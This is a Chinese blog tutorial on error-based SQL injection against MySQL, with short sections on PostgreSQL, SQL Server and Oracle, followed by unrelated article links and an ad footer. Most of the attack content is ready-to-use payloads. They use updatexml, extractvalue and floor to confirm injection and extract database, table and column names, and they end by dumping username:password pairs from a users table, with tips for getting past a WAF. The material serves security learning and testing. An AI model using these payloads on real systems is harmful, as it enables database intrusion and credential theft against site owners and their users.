网络安全 - SQL注入篇 - 报错注入

发布时间:2026/9/24 1:56:51

网络安全 - SQL注入篇 - 报错注入 一、什么是报错注入报错注入Error-Based Injection是SQL注入中“性价比”极高的一种技术。它不需要联合查询那样严格的列数限制也不像盲注那样慢如蜗牛只要数据库报错信息能回显到页面上就能快速“炸”出数据。定义攻击者利用数据库的某些函数如updatexml()、extractvalue()、floor()等故意触发语法错误或类型转换错误让数据库将查询结果作为错误信息的一部分返回给前端页面。二、报错注入利用前提① 存在 SQL注入 漏洞② 数据库错误信息回显到页面(核心!)③ 数据库版本支持报错函数MySQL 5.1.5 支持updatexml/extractvalueMySQL 5.0 支持floor遇到MySQL 5.0以下只能用floor()或geometry函数④ 注入点可执行报错函数三、确认报错注入可用核心目标找到能让报错函数正常触发并输出数据的闭合方式。判断标准如果页面返回了包含数据内容的数据库错误信息说明该闭合有效。序号场景类型测试输入以updatexml为例预期现象响应内容结论1基准测试?id1正常显示数据基准状态2数字型测试?id1 and updatexml(1,concat(0x7e,version()),3)页面报错错误信息中包含数据库版本号如~5.7.36确认为数字型报错注入3字符型 - 单引号?id1 and updatexml(1,concat(0x7e,version()),3) --报错信息中包含版本号确认为单引号闭合4字符型 - 双引号?id1 and updatexml(1,concat(0x7e,version()),3) --报错信息中包含版本号确认为双引号闭合5字符型 - 单引号括号?id1) and updatexml(1,concat(0x7e,version()),3) --报错信息中包含版本号确认为单引号括号闭合6字符型 - 双引号括号?id1) and updatexml(1,concat(0x7e,version()),3) --报错信息中包含版本号确认为双引号括号闭合关键判断如果页面返回的错误信息中包含 ~5.7.36 或 ~8.0.25 等版本号说明报错注入可用且已成功执行。实战技巧优先测 1’单引号命中率最高。如果updatexml被WAF拦截立刻换成extractvalue或floor。核心报错函数速查表函数语法报错原理长度限制适用版本updatexml()updatexml(1, concat(0x7e, payload), 3)XPath路径格式错误导致报错并显示路径内容最长32字符超出截断MySQL 5.1.5extractvalue()extractvalue(1, concat(0x7e, payload))同上XPath格式错误最长32字符MySQL 5.1.5floor()and (select 1 from (select count(*), concat(payload, floor(rand(0)*2)) x from information_schema.tables group by x) y)主键重复floor(rand(0)*2)产生随机重复键无限制完整输出MySQL 5.0geometrycollection()geometrycollection(geomfromtext(concat(0x7e, payload)))几何数据格式无效较长MySQL 5.50x7e 是 ~ 的十六进制编码作为数据与报错信息的分隔符方便肉眼定位数据。四、报错注入的详细步骤第一步确认报错注入存在选择优先级最高的 updatexml 进行测试-- 数字型?id1andupdatexml(1,concat(0x7e,version()),3)-- 字符型单引号?id1andupdatexml(1,concat(0x7e,version()),3)--✅ 页面返回 XPATH syntax error: ‘~5.7.36’ → 报错注入确认可用闭合方式确定。❌ 页面正常无报错 → 尝试换成 extractvalue再不行换 floor。❌❌ 全部无报错 → 报错注入不可用切换到布尔盲注或时间盲注。第二步获取当前数据库名-- 使用 updatexml注意长度限制32字符如果库名太长需用 substr 分段?id1 and updatexml(1, concat(0x7e, database()), 3) -- -- 如果库名超过32字符使用 substr 分段截取 ?id1andupdatexml(1,concat(0x7e,substr(database(),1,31)),3)--?id1andupdatexml(1,concat(0x7e,substr(database(),32,31)),3)--第三步获取当前库下的所有表名-- 获取所有表名group_concat 可能超长需分段?id1 and updatexml(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schemadatabase())), 3) -- -- 如果返回数据被截断只显示一部分使用 substr 分段 ?id1andupdatexml(1,concat(0x7e,substr((selectgroup_concat(table_name)frominformation_schema.tableswheretable_schemadatabase()),1,31)),3)--?id1andupdatexml(1,concat(0x7e,substr((selectgroup_concat(table_name)frominformation_schema.tableswheretable_schemadatabase()),32,31)),3)--第四步获取目标表的字段名与数据-- 获取 users 表的字段名?id1 and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_nameusers and table_schemadatabase())), 3) -- -- 获取 users 表的 username 和 password单条数据使用 limit 限制行数 ?id1andupdatexml(1,concat(0x7e,(selectconcat_ws(:,username,password)fromuserslimit0,1)),3)---- 如果数据超长同样用 substr 分段?id1 and updatexml(1, concat(0x7e, substr((select concat_ws(:,username,password)fromuserslimit0,1),1,31)),3)--五、针对32字符长度限制的解决方案updatexml和extractvalue的报错输出最长只有32个字符含前缀 ~ 和数据。一旦数据超过32字符就会被截断。解决方案1使用 substr() 分段截取-- 第1段第1-31位?id1 and updatexml(1, concat(0x7e, substr((select group_concat(table_name) from information_schema.tables where table_schemadatabase()), 1, 31)), 3) -- -- 第2段第32-62位 ?id1andupdatexml(1,concat(0x7e,substr((selectgroup_concat(table_name)frominformation_schema.tableswheretable_schemadatabase()),32,31)),3)---- 第3段第63-93位?id1andupdatexml(1,concat(0x7e,substr((selectgroup_concat(table_name)frominformation_schema.tableswheretable_schemadatabase()),63,31)),3)--解决方案2直接换用 floor() 报错无长度限制-- floor 报错完整语法注意表名必须存在随意选一个系统表即可?id1and(select1from(selectcount(*),concat((selectgroup_concat(table_name)frominformation_schema.tableswheretable_schemadatabase()),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)y)--floor()报错没有32字符限制但语句冗长适合一次性获取全部数据。六、其他数据库的报错注入数据库报错函数 / 语法示例PostgreSQLcast()类型转换错误?id1 and cast(version() as numeric) --PostgreSQL1/0除零错误?id1 and 1/0 0 --SQL Serverconvert()类型转换错误?id1 and convert(int, version) --SQL Server1/0除零错误?id1 and 1/0 0 --Oracleto_number()类型转换错误?id1 and to_number(to_char(version())) --Oraclectxsys.drithsx.sn()?id1 and ctxsys.drithsx.sn(1,(select banner from v$version where rownum1)) --
延伸阅读

更多相关文章

2026/9/20 0:39:44

从提示词工程到智能体构建:LLM应用开发全链路实战指南

在构建大模型应用时,你是否遇到过这样的困境:精心设计的提示词(Prompt)效果时好时坏,模型输出不稳定;想要让AI根据你的私有知识库回答问题,却不知如何高效整合;或者想构建一个能自主…

2026/9/24 2:15:08

JSONPath语法详解与Python实战:高效查询复杂JSON数据

1. 项目概述:为什么我们需要JSONPath? 如果你经常和JSON数据打交道,尤其是在做API接口测试、数据清洗或者爬虫开发,那你一定对下面这个场景不陌生:面对一个嵌套了七八层、结构复杂得像迷宫一样的JSON响应,你…

2026/9/22 18:38:59

好友一键导出备份,简单又快速!

说到好友备份,很多人的常规操作就是:手动记录好友的微信号、昵称这些数据,一个账号一个账号的去复制粘贴。账号少的情况下,这方法可行,但如果是有好几个微信号,手动记录不仅效率低,还容易出错。…

2026/9/24 2:10:26

DDR内存时序调优:CL、tRCD、tRP、tRAS四大参数详解与实战

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/24 2:10:26

Java+MySQL+SSM框架实战:农业信息管理系统课程设计全流程解析

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/24 2:10:26

从零设计AI加速器:矩阵乘加阵列与存储层次实战

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/24 2:05:26

DMG80480C070串口屏工业落地实战:可靠、易修、抗干扰

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/23 12:07:00

GAMP 5 基于风险的计算机化系统验证:软件分类与审计追踪实践

简介:《A Risk-Based Approach to Compliant GxP Computerized Systems》即业内熟知的GAMP 5指南,面向制药企业质量与IT合规人员、验证工程师及计算机化系统管理者,用于解决GxP法规环境下系统合规性难以科学落地的问题。文档以风险管理为主线…

2026/9/23 12:06:55

安全托管MSSP实战:从静态防御到人机协同的攻防运营与应急响应

简介:这份PPT围绕互联网业务安全托管服务展开,面向企业安全负责人、IT运维人员及关注MSSP/MSS选型的读者,重点回应传统安全过度依赖人工、碎片化静态防御难以对抗产业化攻击等痛点。资源共1个pptx文件,包体约30.63MB,以…

2026/9/24 0:00:21

基于YOLOv8的渔船作业监控系统:从环境搭建到边缘部署全流程

简介:这是一套面向计算机、人工智能、自动化等专业学生与教师的毕业设计级项目资源,围绕YOLOv8实现渔船作业监控系统,可用于毕设、课程设计、大作业或项目立项演示。压缩包共97个文件,约24.21MB,以70个Python源码文件为…

2026/9/24 0:00:21

单细胞注释实战:基于Scanpy的标记基因与参考映射流程解析

简介:一份基于单细胞RNA测序数据的细胞类型注释算法研究Python毕业设计源码,针对计算机相关专业正在做毕设或需要项目实战的学习者,可用于课程设计与期末大作业。项目代码完整、经导师指导评审通过,可直接运行,覆盖数据…

2026/9/24 0:00:21

C#源生成器实战:用增量生成器替代反射,告别AOT崩溃

第一次在项目里被反射卡住,是在一个老旧的WinForms模块里:几十个类依赖PropertyChanged通知,运行时反射读属性、发通知,每次启动慢半拍不说,一上.NET Native/AOT裁剪模式几乎全面崩盘。后来我把这段逻辑全部改成C#源生…

2026/9/22 16:34:32

USB Type-C PCB布局分区设计:电源、高速信号与PD协议全攻略

做硬件这行,Type-C接口算是典型的“看着简单,做起来全坑”的东西。光引脚就24个,高低速信号、电源、控制线全部塞在一个小小的连接器里,如果PCB布局不做规划,打样回来基本就是“插上没反应”、“高速掉线”、“静电一打…

2026/9/22 20:01:30

系统编程学习原型如何补齐稳定性边界

系统编程学习原型如何补齐稳定性边界预算有限时&#xff0c;我先优化明显多余的复制&#xff0c;而不是猜测性地换容器。用借用传递只读数据通常就能减少分配&#xff1a; fn parse(line: &str) -> Result<Item, Error> { /* ... */ }用基准确认热点确实在分配&am…

2026/9/22 13:25:41

雨花区哪家财务公司代理记账比较好?

在雨花区&#xff0c;企业处理财税事务常常面临诸多挑战&#xff0c;选择一家靠谱的财务公司至关重要。湖南巨勤财务管理咨询有限公司就是本地正规实体财税服务机构&#xff0c;深耕本地工商财税行业多年&#xff0c;熟悉当地工商局、税务局最新政策与申报流程。主营公司注册、…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
咨询二维码